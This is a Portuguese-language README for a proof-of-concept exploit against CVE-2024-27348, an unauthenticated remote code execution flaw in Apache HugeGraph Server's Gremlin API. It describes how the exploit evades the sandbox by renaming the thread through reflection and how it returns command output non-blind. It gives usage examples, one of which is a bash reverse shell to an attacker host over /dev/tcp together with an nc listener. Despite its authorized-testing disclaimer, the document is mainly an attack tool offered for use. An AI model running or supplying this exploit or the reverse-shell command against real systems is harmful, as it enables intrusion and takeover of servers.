
Exploração PoC avançada para CVE-2024-27348, alcançando RCE confiável no Apache HugeGraph via bypass de sandbox e execução de comandos não cega.
Um exploit de Prova de Conceito (PoC) avançado e altamente confiável para CVE-2024-27348 (Execução Remota de Código no Apache HugeGraph Server).
Ao contrário de muitos PoCs públicos que executam comandos às cegas ou falham em payloads complexos devido às limitações de Runtime.exec() do Java, este script foi desenvolvido para confiabilidade em cenários reais de teste de penetração.
Apenas para Fins Educacionais e de Teste Autorizado. Esta ferramenta é fornecida para pesquisadores de segurança, testadores de penetração e administradores de sistemas verificarem a vulnerabilidade em ambientes autorizados. O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta.
Este exploit melhora os PoCs públicos iniciais ao abordar três problemas críticos:
gremlin-server-exec-* ou task-worker-*. Este payload usa Java Reflection para renomear dinamicamente a thread de execução para BypassThread antes de acionar o payload, evadindo perfeitamente o security manager.Runtime.getRuntime().exec(String), que quebra comandos bash complexos (como reverse shells) em espaços, este exploit usa ProcessBuilder com uma List<String> formatada corretamente. Isso permite a execução segura de payloads complexos com aspas e redirecionamentos.InputStream do processo executado usando um Scanner do Java e retorna a saída real do comando na resposta HTTP JSON. Você vê exatamente o que o servidor vê.requestsInstale as dependências necessárias:
pip3 install requests
python3 exploit.py -u <TARGET_URL> -c <COMMAND>
Exemplos
python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "whoami"
# On your attacker machine, start a listener:
nc -lvnp 4444
# Execute the exploit:
python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
O Apache HugeGraph Server expõe um endpoint da API Gremlin (/gremlin) que permite aos usuários enviar scripts Groovy. Devido à sandbox insuficiente nas versões anteriores à correção, um atacante não autenticado pode executar comandos arbitrários do sistema operacional via Java Reflection.